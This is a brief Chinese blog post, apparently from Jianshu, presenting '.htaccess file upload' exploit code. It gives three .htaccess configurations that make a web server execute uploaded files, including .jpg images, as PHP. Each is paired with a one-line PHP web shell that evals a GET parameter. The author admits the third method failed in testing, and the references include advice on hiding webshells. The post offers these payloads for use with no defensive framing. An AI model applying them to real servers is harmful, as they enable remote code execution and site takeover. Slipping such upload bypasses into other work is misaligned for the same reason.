.htaccess 文件上传


利用代码 :

.htaccess

法一
# FileMatch 参数即为文件名的正则匹配
<FilesMatch "sniperoj">
  SetHandler application/x-httpd-php
</FilesMatch>
// sniperoj
<?php eval($_GET['c']);?>
法二
AddType application/x-httpd-php .jpg
// filename.jpg
<?php eval($_GET['c']);?>
法三
# 自解析的 .htaccess
<Files "\.htaccess">
    Allow from all
</Files>
<FilesMatch "\.htaccess">
    SetHandler application/x-httpd-php
# <?php eval($_GET[c]);?>
</FilesMatch>
# 不过这种方式测试并没有成功... 暂时不清楚原因

参考链接 :

1. .htaccess官方文档
2. SetHandler官方文档
3. 非法文件上传漏洞技术
4. 隐藏webshell的几条建议
5. .htaccess based attack

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 来源:http://bbs.ichunqiu.com/thread-8907-1-1.html?from=ch 作...
    池寒阅读 1,442评论 1 5
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,887评论 0 9
  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 20,947评论 2 13
  • 漏洞挖掘与利用 测试环境的搭建 引言 为什么要搭建本地测试环境?我想下面的东西能够回答你的疑惑。 第二百八十五条 ...
    作业没写完阅读 3,252评论 0 4
  • 黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。...
    查无此人asdasd阅读 3,805评论 0 3